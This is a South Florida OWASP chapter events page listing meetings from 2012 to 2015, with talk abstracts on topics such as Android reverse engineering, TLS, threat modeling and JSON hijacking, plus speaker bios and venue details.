South Florida

South Florida OWASP Location Sponsor:

Local News
Note to CISSP & CISA holders: OWASP meetings can count towards CPE credits.

Be sure to hook up with us on the social network of your choice to receive updates on our events!

Facebook

Twitter

LinkedIn

Wednesday, October 28, 2015 - 6:00pm - SFLOWASP Special October Event: Lobotomy - Android Reverse Engineering Framework

We will be providing a recap of OWASP AppSecUSA 2015 so plan ahead and mark your calendars!

Talk 1: Lobotomy 


*** New format, new location for this meeting *** Lecture-style (as usual) meeting; it will be held at 6:00 PM to give everyone some time to show up.

Abstract: Lobotomy

This presentation will serve as an introduction for those who want to dive into the art of reverse engineering Android applications and firmware. We will explore the inner workings of the Android architecture, traverse the landscape of reverse engineering tools and techniques, and propose some practical methodologies and workflows for all your bug hunting needs.

Ben Watson has over 7 dedicated years in application and mobile security. Prior to joining GuidePoint Security, Ben solved mobile & application security problems for cutting-edge companies in the financial services, eCommerce, and medical industries. Ben has often been sought after for building application security programs from the ground up. This is due to his experience not only in developing testing methodologies, tools, and techniques, but also in his understanding and perspective around what it takes to build secure products. Ben has managed and led large mobile application security service initiatives, and is also an experienced mobile security researcher. He currently focuses his efforts on discovering new exploitable vulnerability patterns in Android and iOS. He also has multiple published zero-day vulnerabilities affecting various Android web browsers, and is the creator and curator of the Android assessment toolkit called Lobotomy.

Of course afterwards, we will find a local watering hole (TBD) as customary for a community team building event. First round is on OWASP South Florida.

There is paid parking in the building. There may be cheaper parking nearby. We truly apologize for the parking situation; we are trying to get that sorted but may be unable to prior to the event.

Facility Location: Akamai Prolexic (200 E. Las Olas Blvd, Suite 900, Fort Lauderdale, FL)

FREE CPE CREDITS! Did you know you earn 2 CPE credits for attending an OWASP Meeting? It's true! Join us to feed your certs

Wednesday, September 30, 2015 - 5:30pm - South Florida OWASP Meeting – 1 great talk and networking after

We will be providing a recap of OWASP AppSecUSA 2015 so plan ahead and mark your calendars!

Talk 1: OWASP AppSecUSA Recap 

Facility Location:

NOVA SOUTHEASTERN UNIVERSITY Carl DeSantis Building, Main Davie Campus Dean Conference Room 4030 (4th floor) 3301 College Ave Fort Lauderdale, FL 33314-7796

Phone: 800-541-NOVA (6682)

FREE CPE CREDITS! Did you know you earn 2 CPE credits for attending an OWASP Meeting? It's true! Join us to feed your certs

May 2015 Joint SFISSA & OWASP Meeting – Thursday, May 21st, 5:30 – 9:00pm at The Scripps Research Institute (TSRI)

Talk 1: Cybersecurity Risks and Controls around Cloud Environments

Virtualization, and by extension Cloud Computing, have created amazing benefits for IT in the form of increased agility and efficiency with a decrease in spending on physical infrastructure, power, & cooling. With these great operational benefits also comes a new concentration of risk, introduced by the Hypervisor and all of the corresponding tools for management and automation. During this discussion we will examine the typical IT journey towards Cloud Computing and map back how the existing security & compliance controls available in the industry today may or may not provide adequate compensating controls for that risk. Finally, we will discuss the gaps in those control sets and how an IT organization can work to augment its existing controls to fill in the gaps and once again provide a secure and compliant IT infrastructure.

Bio: Keith Cowan

Keith Cowan is a Senior Systems Engineer with HyTrust, a leader in cloud security and compliance. Keith earned an MBA in Business Administration from Dowling College and started his career with Computer Associates (now CA Technologies). Following a successful tenure at CA Technologies, Keith joined Internet Security Systems (ISS). At ISS, he was the Senior Systems Engineer for the NYC metro area, working with different verticals including Government and Financials, building environments utilizing the ISS portfolio. Keith later moved on to Websense as a Senior Sales Engineer handling NYC metro accounts across all verticals. Keith's time at Websense helped him understand the DLP market, address security exposures at various customer accounts across all verticals, and help drive PCI, HIPAA, and SOX compliance. Keith has been an IT Security professional for over 17 years with a focus on pre- and post-sales support management, system design, SAN implementation, security practices/implementation, system integration, project management and resource coordination.

Talk 2: SSL/TLS, CA Issuance Transparency and the future of Authenticated Encryption

SSL/TLS and Certificate Authorities have been the subject of some not-so-pleasant discussion lately, what with all the browser and SSL/TLS exploits and adversaries breaching CAs to issue fake certificates for domains they don't even own. This raises big questions, such as: can I currently browse the internet securely and feel safe about my privacy? In this talk we will go over the current state of SSL/TLS, current concepts and fixes, certificate issuance transparency as a means of detecting bad behavior, and the possible future of Authenticated Encryption.

Bio: Evan Wagner

Evan Wagner has been in the web development industry since the mid-to-late 90s. He got his start when he would go to the library on Howard AFB, in the Republic of Panama, to upload his websites, via floppy disk, to Geocities. He purchased his first domain name (Webmastersland.com) in 1999 and started his hosting company in 2000. It was about that time he became a Linux breakfast-cereal kid, installing Linux on everything and taking on any tasks he could to prove to people the power of Linux. After years of this he found himself in positions of increasing responsibility. Just to name a few: DBA for Florida Cancer Specialists ($1Bn+ yearly revenue), various DevOps roles, networking roles (BGP, SS7), international SMS/MMS communication engineering (tracing messages from handset to handset as well as deploying solutions to carriers) at Interop Technologies, Sr. Software Architect, and currently Systems Software Engineer within Security Engineering at Akamai Technologies. During all this time security has always been a focus, as he has seen first-hand many exploits and attempts over the years and how to mitigate them.

Facility Location: The Scripps Institute. The meeting will take place in the auditorium in Building B.

Venue and Directions

Directions from the North (via Florida Turnpike or I-95)

On the turnpike exit at Indiantown Road, drive east to I-95 and go south one exit to Donald Ross Road (I-95 exit #83). Exit and drive east (left turn at exit traffic light). Turn left onto Central Blvd. Drive around the first traffic circle to the entrance of Scripps Florida (just beyond intersection of Main Street). Park in the “Visitor” parking in front of Building B. Check in with the security guard in Building B.

Directions from the South (via Florida Turnpike or I-95)

From the turnpike exit at PGA Blvd., drive east to I-95 and then go north one exit to Donald Ross Road (I-95 exit #83). Exit and drive east (right turn at exit traffic light). Turn left onto Central Blvd. Drive around the first traffic circle to the entrance of Scripps Florida (just beyond intersection of Main Street). Park in the “Visitor” parking in front of Building B. Check in with the security guard in Building B.

FREE CPE CREDITS! Did you know you earn 2 CPE credits for attending an OWASP Meeting? It's true! Join us to feed your certs

Wednesday, March 18, 2015 - 5:30pm - South Florida OWASP Meeting – 2 great talks and networking after

This is the first meeting for 2015! We have an excellent line up of speakers, topics, and networking scheduled for you so plan ahead and mark your calendars!

Talk 1: Application Security - A fresh perspective

Breaches are in the news as never before and it is clear that application security is falling behind. Different technologies are being introduced and application security does not appear to be keeping up with these changes.

In this talk we will discuss some different approaches that have been successfully employed by several leading technology organizations. These include creating attack aware applications using application sensors, continuous deployment and the advantages of bug bounty programs.

Bio: Rohini Sulatycki

Rohini Sulatycki is a Senior Security Consultant within the Application Security practice at Trustwave's SpiderLabs. Rohini has been involved in the Information Technology industry for more than 16 years. Rohini specializes in application security testing, code reviews and secure software development conducting a large number of application, virtualization, mobile and external network tests in her capacity at Trustwave. She has also conducted Secure Development Training classes for clients worldwide. She has strong foundations in software engineering, design and architecture and implementing enterprise applications. Rohini has a background implementing and reviewing all types of applications, from traditional client/server applications to web applications and web services. Rohini has served as the president of the Kansas City OWASP chapter and a member of the High Technology Crime Investigation Association (HTCIA) and is the current co-chair of the South Florida OWASP chapter. She has been a technical reviewer for several books and publications including Java Security and IEEE Security and Privacy. She has also presented at various industry events including Black Hat and OWASP FROC.

Talk 2: Crypto: Doing it wrong

Cryptography is a dark art to many developers, and errors in implementations are common. This talk is designed to highlight the last few implementation flaws and how attackers can abuse them.

Bio: Moses Hernandez

My name is Moses Hernandez. I've been in the Information Security 'industry' professionally since the late 90s. Having worked in and around the industry for as long as I have, you get to wear many hats and see many things. From Network Engineering and Architecture and also getting involved in Software, Applications, Development and other aspects of computer science I have no business being in. He has worked for SANS as an Instructor for their Penetration Testing Courses as well as worked in an Architect capacity for many years. He is currently employed with Cisco Systems. If you want to talk about the intricacies of building scalable networks or get down in debugging software we can have both conversations comfortably. But you know what really gets me going? People, Companies, Software, and our community.

Facility Location:

NOVA SOUTHEASTERN UNIVERSITY Carl DeSantis Building, Main Davie Campus Dean Conference Room 4030 (4th floor) 3301 College Ave Fort Lauderdale, FL 33314-7796

Phone: 800-541-NOVA (6682)

FREE CPE CREDITS! Did you know you earn 2 CPE credits for attending an OWASP Meeting? It's true! Join us to feed your certs

Wednesday, Oct 15, 2014 - 5:30pm - Joint South Florida OWASP & ISSA Meeting – 2 great talks and networking after

Our October 2014 meeting will be the annual joint meeting between the South Florida ISSA chapter and the South Florida OWASP chapter. We have an excellent line up of speakers, topics, and networking scheduled for you so plan ahead and mark your calendars!

Talk 1: Software Security Assurance: Keeping your security program on the rails

In working with dozens of organizations across all industries, a common theme has emerged as it relates to effective implementation of software security assurance programs: they generally are not effective. In fact, in numerous cases, programs are often shelved outright after several years of multiple implementation attempts. An obvious downside of this failure is a lack of return on security technology investments. The reasons for failure vary, but it often comes down to an absence of management commitment, a lack of focus, or simply insufficient awareness and education amongst stakeholders. This presentation explores why programs do not get off the ground or flounder after launch, and what can and should be done to prevent or correct those situations. Developers, project leads, architects and information security managers will benefit from discussions about the key elements to effective security program implementation.

Bio: Bruce Jenkins

Bruce C Jenkins, CISSP, leads HP Fortify's Software Security Assurance (SSA) enablement strategy and works regularly with customers on SSA program development and measurement. He is a 28-year US Air Force veteran who has been a Fortify evangelist and builder of SSA solutions since 2007. He has supported more than 60 professional services engagements and collected data on more than 350 security assessments across all industry sectors. Bruce holds a BS in computer science and an MS in management science.

Talk 2: AppSec at DevOps Speed and Portfolio Scale

Software development is moving much faster than application security, with new platforms, languages, frameworks, paradigms, and methodologies like Agile and DevOps. Unfortunately, software assurance hasn't kept up with the times. For the most part, our security techniques were built to work with the way software was built in 2002. Here are some of the technologies and practices that today's best software assurance techniques *can't* handle: JavaScript, Ajax, inversion of control, aspect-oriented programming, frameworks, libraries, SOAP, REST, web services, XML, JSON, raw sockets, HTML5, Agile, DevOps, WebSocket, Cloud, and more. All of these rest pretty much at the core of modern software development. Although we're making progress in application security, the gains are much slower than the stunning advances in software development. After 10 years of getting further behind every day, software *assurance* is now largely incompatible with modern software *development*. It's not just security tools -- application security processes are largely incompatible as well. And the result is that security has very little influence on the software trajectory at all. Unless the application security community figures out how to be a relevant part of software development, we will continue to lag behind and effect minimal change. In this talk, I will explore a radically different approach based on instrumenting an entire IT organization with passive sensors to collect real-time data that can be used to identify vulnerabilities, enhance security architecture, and (most importantly) enable application security to generate value. The goal is unprecedented real-time visibility into application security across an organization's entire application portfolio, allowing all the stakeholders in security to collaborate and finally become proactive.

[[Media: 2014-10_OWASP_SF_Continuous.pdf]]

Bio: Jeff Williams

Jeff Williams is a founder and CEO of Aspect Security and recently launched Contrast Security, a new approach to application security analysis. Jeff was an OWASP Founder and served as Global Chairman from 2004 to 2012, contributing many projects including the OWASP Top Ten, WebGoat, ESAPI, ASVS, and more. Jeff is passionate about making it possible for anyone to do his or her own continuous application security in real time.

Facility Location:

NOVA SOUTHEASTERN UNIVERSITY Carl DeSantis Building, Main Davie Campus Room 1052 3301 College Ave Fort Lauderdale, FL 33314-7796

Phone: 800-541-NOVA (6682)

FREE CPE CREDITS! Did you know you earn 2 CPE credits for attending an OWASP Meeting? It's true! Join us to feed your certs

Wednesday, May 21, 2014 - 5:00pm - South Florida OWASP Meeting – 2 great talks and networking after

Talk 1: Agile Security

Agile, DevOps, and the Security Practitioner? I have worked in this business for almost 15 years now. I left for a few years because of the misery of the industry. Or so I thought? I really went to go find myself. When I came back I found that I was a different person. What I learned about working outside of Information Security is that we really have lost touch and have stopped relating with our peers. I felt the schism very much so. Let's fix that. This talk is about our Industry and about us. It's about Culture, People over Tools, what we need to do to be successful, and how we need to work together. It's about what the next 15 years will be for us and why it's important that we must adopt and change the way we are.

If you don't understand the fight-or-flight moment we all face then we will be replaced with those who do understand it. It's not that we won't be subject matter experts, or that we are not some of the brightest minds in our fields. The problem is we can't get out of our own way. In this mostly visually impactful, entertaining talk, I present a way out. We must be brave to embrace it. Most of all, we must start that education process now, because we are already behind the eight ball. This talk is built like a sermon, almost religious-like, because make no mistake, the way to solve the problem is to start re-thinking who we are and why we are here. The time is now.

Bio: Moses Hernandez

My name is Moses Hernandez. I've been in the Information Security 'industry' professionally since the late 90s. Having worked in and around the industry for as long as I have, you get to wear many hats and see many things. From Network Engineering and Architecture and also getting involved in Software, Applications, Development and other aspects of computer science I have no business being in.

He has worked for SANS as an Instructor for their Penetration Testing Courses as well as worked in an Architect capacity for many years. He is currently employed with Cisco Systems. If you want to talk about the intricacies of building scalable networks or get down in debugging software we can have both conversations comfortably. But you know what really gets me going? People, Companies, Software, and our community.

Talk 2: Third-party application software controls

All businesses depend on software from third-party software providers and commercial off-the-shelf software (COTS) vendors. Organizations can hope the software from third parties is built securely, but hope isn't a viable security strategy. Recent breaches highlight that risks introduced by third-party software can impact an organization's confidentiality, integrity and availability. However, a recent study by PWC highlighted that only 20% of organizations consider the impact of third-party risk in their security strategy. The FS-ISAC published controls for addressing third-party risks in your software. This presentation talks through the 3 technical controls recommended and how you can benefit from them.

Bio: Rishi Pande

Facility Location:

NOVA SOUTHEASTERN UNIVERSITY Carl DeSantis Building, Main Davie Campus Dean Conference Room 4030(4th Floor) 3301 College Ave Fort Lauderdale, FL 33314-7796

Phone: 800-541-NOVA (6682)

FREE CPE CREDITS! Did you know you earn 2 CPE credits for attending an OWASP Meeting? It's true! Join us to feed your certs

Wednesday, March 19, 2014 - 5:00pm - South Florida OWASP Meeting – 2 great talks and networking after

Talk 1: Classification, Facets, and Conceptual Space in Security Analysis and the Use of Patterns

Security is a complicated field. It involves many different situations, technologies, vulnerabilities, policies and regulations, with challenges that differ from one domain to the next. At the same time, security must be comprehensive. It is not sufficient to be good at only some things, or in some areas. The patterns community has responded to the challenge by documenting best practices in the form of patterns. To date, there are more than 400 security patterns, and the number keeps growing, which creates a problem of its own. How do you know which patterns address your situation? We haven't solved this problem. But we have made progress by redefining the task from "How do you classify patterns?" to "How do you divide up the problem space into meaningful regions of concern where useful patterns might be found?" In this talk we describe a method of subdividing concerns specific to the problem of security, based on George Miller's idea of concept grids. An interesting feature of this work is that it creates a framework for discussing security concerns and investigating spaces that aren't covered, as well as those that are.

Bio: Dr. Van Hilst is an associate professor in the Farquhar College of Arts and Sciences at Nova Southeastern University. Prior to joining Nova, he taught at Florida Atlantic University, served as VP for Technology at a firewall startup, and was a member of the technical staff at HP Labs in Palo Alto. Earlier he worked on data analysis at Harvard University, code development at IBM Research, and signal processing for the French government. Dr. Van Hilst earned his PhD in Computer Science from the University of Washington and holds three degrees from MIT. He is the author of more than 40 articles on security and software engineering.

[[Media:Vanhilst_owasp_140319.pdf]]

Talk 2: Secure by Design

Building security into the SDLC is essential to creating secure applications. The cost of security issues identified during an application penetration test or code review can be exponentially higher than addressing these security concerns earlier in the SDLC. This talk will address integrating security into the requirements, architecture and design process. We will walk through misuse cases and threat modeling, and review security design patterns.

Bio: Rohini Sulatycki is a Senior Security Consultant within the Application Security practice at Trustwave's SpiderLabs. Rohini has been involved in the Information Technology industry for more than 16 years. Rohini specializes in application security testing, code reviews and secure software development conducting a large number of application, virtualization, mobile and external network tests in her capacity at Trustwave. She has also conducted Secure Development Training classes for clients worldwide. She has strong foundations in software engineering, design and architecture and implementing enterprise applications. Rohini has a background implementing and reviewing all types of applications, from traditional client/server applications to web applications and web services. Rohini has served as the president of the Kansas City OWASP chapter and a member of the High Technology Crime Investigation Association (HTCIA) and is the current co-chair of the South Florida OWASP chapter. She has been a technical reviewer for several books and publications including Java Security and IEEE Security and Privacy. She has also presented at various industry events including Black Hat and OWASP FROC.

[[Media:Sulatycki_Secure-By-Design_140319.pdf]]

Facility Location:

NOVA SOUTHEASTERN UNIVERSITY Carl DeSantis Building, Main Davie Campus Dean Conference Room (4th Floor) 3301 College Ave Fort Lauderdale, FL 33314-7796

Phone: 800-541-NOVA (6682)

FREE CPE CREDITS! Did you know you earn 2 CPE credits for attending an OWASP Meeting? It's true! Join us to feed your certs

Wednesday, September 25, 2013 - 5:00pm - South Florida OWASP Meeting – Joint meeting with South Florida ISSA, networking after

Talk 1: BYOP: Bring Your Own Policy

How to write (by consensus) information security, Internet use and privacy policies; come away with a policy written by the group (and you will see why it's hard to please everyone). We will start with a downloaded sample BYOD / smartphone policy, talk about the basics (what is BYOD, legal issues, security issues, safety issues) and write a BYOD / mobile device policy. Takeaways include the 15 most important policies, a policy checklist, and a sample BYOD / smartphone policy.

Bio: Michael Scheidell is a recognized expert in the information security and privacy community with a strong history of innovation and entrepreneurship. He is a frequent conference speaker and subject matter expert in InfoSec and Digital Privacy issues. He developed a suite of IT security products with impressive results, including a patented intrusion detection system, an award-winning email security solution and a revolutionary IT Risk and Assessment framework currently used by large multinational companies, healthcare organizations and financial institutions to ensure their privacy and security. Certified CISO (C|CISO), Member FBI InfraGard, ISSA, ISACA, IAPP. Managing Director of Security Privateers.

Talk 2: What's Hiding in Your Software Components? Hidden Risks of Component-Based Software

Software is no longer written, it's assembled. With 80% of a typical application now being assembled from components, it's time to take a hard look at the new risks posed by this type of development -- and the processes and tools that we'll need in order to keep them in check.

Join Ryan Berg, Sonatype CSO, as he shares real-world data on component risks, outlines the scope of the problem, and proposes approaches for managing these risks. You'll learn how security professionals can work cooperatively with application developers to reduce risk AND boost developer efficiency.

Bio: Ryan is the Chief Security Officer at Sonatype. Before joining Sonatype, Ryan was a co-founder and chief scientist for Ounce Labs which was acquired by IBM in 2009. Ryan holds multiple patents and is a popular speaker, instructor and author, in the fields of security, risk management, and secure application development.

Facility Location:

NOVA SOUTHEASTERN UNIVERSITY Carl DeSantis Building, Main Davie Campus Room 3035 3301 College Ave Fort Lauderdale, FL 33314-7796

Phone: 800-541-NOVA (6682)

FREE CPE CREDITS! Did you know you earn 2 CPE credits for attending an OWASP Meeting? It's true! Join us to feed your certs

Wednesday, July 17th, 2013 - 6:00pm - South Florida OWASP Meeting – Great talk and networking after

Talk 1: A Security Reference Architecture for Cloud Systems

Reference architectures (RAs) are becoming useful tools to understand and build complex systems and many cloud providers and software product vendors have developed versions of them. However, until now few security reference architectures have appeared. Almost all of them use rather imprecise models and this appears to be the first attempt to define them more precisely. We propose here a Security Reference Architecture (SRA) defined using UML models and incorporating our approach to build secure systems. By SRA we mean a RA where security services have been added in appropriate places to provide some degree of security for the complete cloud environment. We use as starting point our own cloud reference architecture and we combine security patterns and misuse patterns to build a secure reference architecture. By checking if a threat, expressed as a misuse pattern, can be stopped or mitigated in the secure reference architecture, we can evaluate its level of security. We have done a systematic enumeration of cloud threats and have started building a catalog of cloud misuse patterns; with a complete catalog we can apply them systematically and use the reference architecture to find where we should add corresponding security patterns to stop them. We are also building a catalog of cloud security patterns; security patterns join the extensive knowledge accumulated about security with the structure provided by patterns to provide guidelines for secure system design and evaluation.

Bio: Eduardo B. Fernandez is a professor in the Department of Computer Science and Engineering at Florida Atlantic University, Boca Raton, Florida. He is now a Visiting Professor at Universidad Tecnica Federico Santa María, Valparaiso, Chile. He has published numerous papers on security models, and object-oriented analysis/design, including two books on security patterns. He has lectured all over the world at both academic and industrial meetings. His current interests include software architecture, cloud computing, and security patterns. He holds a MS degree in Electrical Engineering from Purdue University and a Ph.D. in Computer Science from UCLA. He is a Senior Member of the IEEE, and a Member of ACM. He is an active consultant for industry. More details: http://www.cse.fau.edu/~ed

[[Media:SecResearchOWASP7-2013.pdf]]

Facility Location:

NOVA SOUTHEASTERN UNIVERSITY Carl DeSantis Building, Main Davie Campus Room 1124 Knight Lecture Hall Auditorium 3301 College Ave Fort Lauderdale, FL 33314-7796

Phone: 800-541-NOVA (6682)

FREE CPE CREDITS! Did you know you earn 2 CPE credits for attending an OWASP Meeting? It's true! Join us to feed your certs

Wednesday, April 24th, 2013 - 5:00pm - South Florida OWASP Meeting – Two great talks and networking after

Join us for our April meeting where we will have two great talks. Please note that the scheduled talks are for 60 minutes each with a small break in between. We will have a networking event after as usual.

Talk 1: Threat Modeling

As we focus on the threats that plague our organizations, we not only need to understand the threat but also the steps used by the attackers. Profiling these attacks enables threat modeling, allowing you and your organization to understand how to successfully position yourselves against threat actors and adversaries. In this session I will share some high-level attack profiles or patterns and how we should look at them to successfully set your organizational course and security strategy. I will also share some detailed models which I have previously developed to help organizations successfully model web application threats.

Bio: James Robinson is Head of Security Architecture and a Strategy Officer at Websense. His key responsibilities are internal security strategy development, innovation, and Websense Strategy. James brings more than a decade of both IT and product engineering security leadership to Websense. He has previously held senior positions with Fortune 150 and Fortune 100 companies including Emerson Electric, Anheuser-Busch and State Farm Insurance, and holds more than 10 industry certifications. Throughout his career James has delivered solutions for network architecture and application security, penetration testing, incident response, security and risk assessment, forensics and investigations, and product security.

Talk 2: Adding Security to BPEL Workflows of Web Services

BPEL (Business Process Enterprise Language) is a language for web services composition, and several implementations of it exist. For BPEL to be effective, it is necessary that it provide more support for security. BPEL doesn't present any means to specify security constraints for workflows. BPEL, through its activities, tries to provide specific functional aspects, and any non-functional aspects are expected to be addressed by other (lower-level) specifications. We present here a way to specify security requirements in BPEL. Since BPEL describes workflows, we present its activities using UML activity diagrams, where we apply a threat enumeration approach to determine the security mechanisms required to stop these threats. Our approach goes beyond BPEL and can be applied to BPMN and other business flow languages.

Bio: Ola Ajaj is a PhD candidate in the Dept. of Computer and Electrical Engineering and Computer Science at Florida Atlantic University, Boca Raton, Florida. His current interests include secure systems, web services, cloud computing, and mobile platforms. He holds an MS degree in Computer Engineering from Florida Atlantic University. While completing his education, he worked for Motorola, BlackBerry (formerly RIM) and IBM. He has published papers on patterns for web services standards, and he continues his PhD dissertation under Dr. Eduardo B. Fernandez's supervision.

Facility Location: NOVA SOUTHEASTERN UNIVERSITY, Carl DeSantis Building, Main Davie Campus, Room 1052 (1st floor, east side of the building), 3301 College Ave, Fort Lauderdale, FL 33314-7796. Phone: 800-541-NOVA (6682)

FREE CPE CREDITS! Did you know you earn 2 CPE credits for attending an OWASP Meeting? It's true! Join us to feed your certs.

Wednesday, February 27th, 2013 - 5:00pm - South Florida OWASP Meeting – One great talk and networking after

Join us for our first meeting of 2013, where we will have one great talk: the OWASP Top 10 2013 rc1! Our event sponsor, NoVA, will also be there with some important announcements.

Talk: OWASP Top 10 2013 rc1

The primary aim of the OWASP Top 10 is to educate developers, designers, architects and organizations about the consequences of the most important web application security weaknesses. The Top 10 provides basic methods to protect against these high risk problem areas and provides guidance on where to go from there. The Top 10 project is referenced by many standards, books, tools, and organizations, including MITRE, PCI DSS, DISA, FTC, and many more. The OWASP Top 10 was initially released in 2003 and minor updates were made in 2004, 2007, and 2010.

The latest and greatest OWASP Top 10 2013 rc1 has just been released! Come and get a first-hand view of the changes to the OWASP Top 10. Make sure you don't miss this great opportunity to start the year right!

Bio: Rohini Sulatycki is a Senior Security Consultant within the Application Security practice at Trustwave's SpiderLabs. SpiderLabs is the advanced security team responsible for Penetration Testing, Application Security, Incident Response, and Payment Application testing for Trustwave's clients. Rohini has been involved in the Information Technology industry for more than 16 years. Rohini specializes in application security testing, code reviews and secure software development conducting a large number of application, virtualization, mobile and external network tests in her capacity at Trustwave. She has strong foundations in software engineering, design and architecture and implementing enterprise applications. Rohini has a background implementing and reviewing all types of applications, from traditional client/server applications to web applications and web services. Rohini has served as the president of the Kansas City OWASP chapter and a member of the High Technology Crime Investigation Association (HTCIA) and is the current co-chair of the South Florida OWASP chapter. She has been a technical reviewer for several books and publications including Java Security and IEEE Security and Privacy. She has also presented at various industry events including Black Hat and OWASP FROC on topics such as Web application security, Ajax security concerns and Flash application security.

Facility Location: NOVA SOUTHEASTERN UNIVERSITY, Carl DeSantis Building, Main Davie Campus, Knight Lecture Hall (Room 1124), 3301 College Ave, Fort Lauderdale, FL 33314-7796. Phone: 800-541-NOVA (6682)


Wednesday, Nov 28, 2012 - 5:00pm - South Florida OWASP Meeting - Two great talks and networking after

Join us for our November meeting where we will have two great talks. Please note that the scheduled talks are for 45 minutes each with a small break in between. We will have a networking event after as usual.

Talk 1: Kies Air Vulnerabilities

In this talk, the security issues found (CVE-2012-5858, CVE-2012-5859) in the default installation of the Kies Air Android application bundled with every new Samsung Galaxy S3 will be uncovered. A shell script will be released making detection of running Kies Air simple to explore while bypassing device administration to obtain phone contents or the option to crash the application at will. This is the result of private research and the findings will be publicly disclosed along with tools and a whitepaper.

Bio: Claudio J. Lacayo causes 500 response errors in web applications and is currently evangelizing the use of native code over frameworks.

Talk 2: The Story Behind the Dirt Jumper SQL Injection Whitepaper - An Analysis of DDoS C&C Vulnerabilities

The team from Prolexic Technologies' PLXsert will talk about their research on vulnerabilities within the Dirt Jumper DDoS botnet. This research has been featured in multiple global media outlets and made international headlines. The talk will discuss the methods, tools, and techniques that were used in the discovery of this vulnerability and the implications for the future of DDoS infrastructures. PLXsert will also discuss the latest trends, techniques, and methodologies being utilized in the DDoS threatscape.

http://arstechnica.com/security/2012/08/ddos-take-down-manual/

http://www.theregister.co.uk/2012/08/15/dirt_jumper_ddos_tool_flaw/

http://threatpost.com/en_us/blogs/researchers-find-flaw-dirt-jumper-bot-081512

http://www.csoonline.com/article/714000/popular-dirt-jumper-ddos-toolkit-riddled-with-security-flaws-research-finds

http://www.darkreading.com/vulnerability-management/167901026/security/news/240005474/prolexic-exposes-vulnerabilities-in-dirt-jumper-ddos-toolkit-family.html

http://www.xakep.ru/post/59168/

Bio: PLXsert monitors malicious cyber threats globally and analyzes DDoS attacks using proprietary techniques and equipment. Through digital forensics and post-attack analysis, PLXsert is able to build a global view of DDoS attacks, which is shared with customers and the security community. By identifying the sources and associated attributes of individual attacks, the PLXsert team helps organizations adopt best practices and make more informed, proactive decisions about DDoS threats.

Please vote on our new poll and let us know what future topics you would like to see presented at our meetings this year : http://www.linkedin.com/groupItem?view=&gid=2462364&type=member&item=101892186&qid=641ae738-dc10-48a0-8eaa-64b664bf99f2&trk=group_most_popular-0-b-ttl&goback=.gmp_2462364

Facility Location: NOVA SOUTHEASTERN UNIVERSITY, Carl DeSantis Building, Main Davie Campus, Room TBD, 3301 College Ave, Fort Lauderdale, FL 33314-7796. Phone: 800-541-NOVA (6682)


Wednesday, Sept 26, 2012 - 5:00pm - South Florida OWASP Meeting - Two great talks and networking after

Join us for our September meeting, where we will have two great talks. Please note that the scheduled talks are 30 minutes each, with a small break in between. We will have a networking event after, as usual. Our event sponsor, NoVA, will also be there with some important announcements.

Talk 1: Application Vulnerability Assessment Risk (AVAR) Score

During an application vulnerability assessment a number of vulnerabilities may be discovered. Issues discovered during this assessment are given a risk score value or a rating of High, Medium, or Low, mostly based on the Common Vulnerability Scoring System (CVSS) or Common Weakness Enumeration (CWE) risk classification of known vulnerabilities. The industry's application vulnerability risk classification models assign a risk level to an issue based on the impact of the specific vulnerability. They do not take into consideration the likelihood of occurrence based on known reported incidents, or the impact of interdependencies between related vulnerabilities. The AVAR Score implements an approach that provides a holistic analysis of the risk of an application based on the interdependencies of related vulnerabilities and the probability of occurrence.

Bio: An avid learner, Jummy has a degree in Engineering Physics but has always been interested in information security, and she decided to make a career of it. Over the years, Jummy's work has included application vulnerability assessments, security audits, and risk assessments for a wide variety of local, national, and international organizations. When she is not occupied with work she tries to invent new cooking recipes, and she also volunteers as a mentor to young adults.

Talk 2: JSON Hijacking

JavaScript Object Notation (JSON) is a language- and platform-independent format for data interchange. JSON is in widespread use, with a number of JSON parsers and libraries available for different languages. While some information is available on JSON Hijacking, this attack is not very well understood.

Rohini Sulatycki will give an overview of this attack as well as provide a demonstration.

Bio: Rohini Sulatycki is a Senior Security Consultant within the Application Security practice at Trustwave's SpiderLabs. SpiderLabs is the advanced security team responsible for Penetration Testing, Application Security, Incident Response, and Payment Application testing for Trustwave's clients. Rohini has been involved in the Information Technology industry for more than 16 years. Rohini specializes in application security testing, code reviews and secure software development conducting a large number of application, virtualization and external network tests in her capacity at Trustwave. She has strong foundations in software engineering, design and architecture and implementing enterprise applications. Rohini has a background implementing and reviewing all types of applications, from traditional client/server applications to web applications and web services. Rohini has served as the president of the Kansas City OWASP chapter and a member of the High Technology Crime Investigation Association (HTCIA) and is the current co-chair of the South Florida OWASP chapter. She has been a technical reviewer for several books and publications including Java Security and IEEE Security and Privacy. She has also presented at various industry events including Black Hat and OWASP FROC on topics such as Web application security, Ajax security concerns and Flash application security.


Facility Location: NOVA SOUTHEASTERN UNIVERSITY, Carl DeSantis Building, Main Davie Campus, Knight Lecture Hall (Room 1124), 3301 College Ave, Fort Lauderdale, FL 33314-7796. Phone: 800-541-NOVA (6682)


Wednesday, June 27, 2012 - 6:00pm - South Florida OWASP Meeting - Two great talks and networking after

Join us for our June meeting where we will have two great talks. Please note that the scheduled talks are for 30 minutes each with a small break in between. We will have a networking event after as usual.

Talk 1: Bad encryption implementations using PBKDF2

PBKDF2 is a popular way to generate long encryption keys from human-memorable passwords and passphrases. Used properly, it can keep encrypted sensitive data safe from attackers long enough for its ultimate compromise to be almost moot (assuming the attacker doesn't lose interest and give up first). Used badly, in conjunction with poorly-implemented AES encryption, it will protect sensitive data for approximately 5 minutes against an attacker with a 2-year-old laptop and a list of compromised real-world passwords obtained from popular websites.

Presenter Bio: Jeff Skubick is a security analyst with more than a decade of professional experience developing mobile and web applications for companies like Verizon, and a lifetime of recreational hacking that extends far enough back into childhood to remember what happens when you JSR to $FFD2. His second language was 6502 assembly. As a teenager, he doubled his Amiga’s RAM by soldering piggybacked chips onto the motherboard, then spent 10 minutes on the phone with Dave Haynie learning what a "slow PAL" was. In his spare time, he invalidates warranties, builds robots, and takes liberties with local building codes in the name of home automation. He will never, ever make the mistake of buying another Motorola Android phone with a locked bootloader.

Talk 2: Mobile Framework vulnerabilities

Mobile frameworks are being used for cross-platform development and to ease development efforts in producing applications for iOS/Android/Blackberry devices. In this talk we observe bad development practices and expose some issues found in open source frameworks, notably Apache Cordova (previously known as "PhoneGap").

Presenter Bio: Claudio J. Lacayo causes 500 response errors in web applications and is currently evangelizing the use of native code over frameworks.


Facility Location: NOVA SOUTHEASTERN UNIVERSITY, Carl DeSantis Building, Main Davie Campus, Knight Lecture Hall (Room 1124), 3301 College Ave, Fort Lauderdale, FL 33314-7796. Phone: 800-541-NOVA (6682)


